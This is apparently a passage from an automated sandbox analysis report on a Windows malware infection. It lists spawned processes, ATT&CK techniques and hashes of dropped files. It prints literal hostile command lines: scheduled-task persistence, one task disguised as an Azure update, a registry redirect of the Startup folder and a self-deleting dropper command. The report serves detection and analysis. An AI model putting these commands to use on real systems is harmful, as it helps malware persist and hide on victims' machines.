                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5256
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:2076
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  2⤵
                                                                                                                                    PID:2196
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:64
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 66BFA3E6BBC395A36258423279679B6D C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:1332
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 02C303304FF9473DDB7CCC8DF4BCDB02 C
                                                                                                                                    2⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:5748
                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 8B942066D7352BEA06B1A8D3FDBD26B4
                                                                                                                                    2⤵
                                                                                                                                      PID:8852
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 51E1ABE173A270D647BB905B28839B8A C
                                                                                                                                      2⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:9168
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      PID:6136
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                        3⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:7532
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:2476
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffb9a9edec0,0x7ffb9a9eded0,0x7ffb9a9edee0
                                                                                                                                            5⤵
                                                                                                                                              PID:5252
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff632ad9e70,0x7ff632ad9e80,0x7ff632ad9e90
                                                                                                                                                6⤵
                                                                                                                                                  PID:388
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                                                                                5⤵
                                                                                                                                                  PID:3760
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                                                                                  5⤵
                                                                                                                                                    PID:5876
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --mojo-platform-channel-handle=2096 /prefetch:8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:9016
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2488 /prefetch:1
                                                                                                                                                      5⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      PID:3480
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2712 /prefetch:1
                                                                                                                                                      5⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      PID:6592
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --mojo-platform-channel-handle=3172 /prefetch:8
                                                                                                                                                      5⤵
                                                                                                                                                        PID:1372
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1652,17236410519790257212,1361646570623878244,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2476_2058196312" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2772 /prefetch:2
                                                                                                                                                        5⤵
                                                                                                                                                          PID:8028
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_CCF.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                      3⤵
                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                      PID:6780
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:5080
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:7328
                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:8272
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:8588
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:8724
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                  1⤵
                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  PID:8780
                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                    DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0608515a-3aa2-3849-91fc-40623cb14a31}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:8804
                                                                                                                                                    • C:\Windows\system32\DrvInst.exe
                                                                                                                                                      DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:7384
                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                    PID:7072
                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:8712
                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:8768
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B50F.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B50F.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:3912
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C8E6.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C8E6.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5880
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6908
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                              3⤵
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:8804
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6464
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                3⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:6224
                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                            1⤵
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            PID:7080
                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                              2⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:8928
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:8364
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:8792
                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                            1⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:9108
                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                              2⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:8652
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F9BB.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\F9BB.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8940
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\YB7rwRaxXs.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\YB7rwRaxXs.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:8692
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:8716
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:8852
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7nVgRhlpWb.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7nVgRhlpWb.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  PID:7808
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:8964
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F9BB.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:7280
                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:9100
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:5852
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5200
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:8332
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:8436
                                                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4688
                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                        PID:1620
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:8400

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                      Execution

                                                                                                                                                                      Scheduled Task

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Persistence

                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                      1
                                                                                                                                                                      T1031

                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                      1
                                                                                                                                                                      T1060

                                                                                                                                                                      Scheduled Task

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                      Scheduled Task

                                                                                                                                                                      1
                                                                                                                                                                      T1053

                                                                                                                                                                      Defense Evasion

                                                                                                                                                                      Modify Registry

                                                                                                                                                                      4
                                                                                                                                                                      T1112

                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                      1
                                                                                                                                                                      T1089

                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                      1
                                                                                                                                                                      T1497

                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                      1
                                                                                                                                                                      T1130

                                                                                                                                                                      Credential Access

                                                                                                                                                                      Credentials in Files

                                                                                                                                                                      4
                                                                                                                                                                      T1081

                                                                                                                                                                      Discovery

                                                                                                                                                                      Software Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1518

                                                                                                                                                                      Query Registry

                                                                                                                                                                      7
                                                                                                                                                                      T1012

                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                      1
                                                                                                                                                                      T1497

                                                                                                                                                                      System Information Discovery

                                                                                                                                                                      7
                                                                                                                                                                      T1082

                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                      2
                                                                                                                                                                      T1120

                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                      1
                                                                                                                                                                      T1018

                                                                                                                                                                      Collection

                                                                                                                                                                      Data from Local System

                                                                                                                                                                      4
                                                                                                                                                                      T1005

                                                                                                                                                                      Command and Control

                                                                                                                                                                      Web Service

                                                                                                                                                                      1
                                                                                                                                                                      T1102

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        9499dac59e041d057327078ccada8329

                                                                                                                                                                        SHA1

                                                                                                                                                                        707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                        SHA256

                                                                                                                                                                        ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                        SHA512

                                                                                                                                                                        9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        9499dac59e041d057327078ccada8329

                                                                                                                                                                        SHA1

                                                                                                                                                                        707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                        SHA256

                                                                                                                                                                        ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                        SHA512

                                                                                                                                                                        9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                        SHA1

                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                        SHA256

                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                        SHA512

                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                        SHA1

                                                                                                                                                                        568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                        SHA256

                                                                                                                                                                        096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                        SHA512

                                                                                                                                                                        ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                        SHA1

                                                                                                                                                                        3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                        SHA256

                                                                                                                                                                        5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                        SHA512

                                                                                                                                                                        63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                        MD5

                                                                                                                                                                        a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                        SHA1

                                                                                                                                                                        3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                        SHA256

                                                                                                                                                                        5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                        SHA512

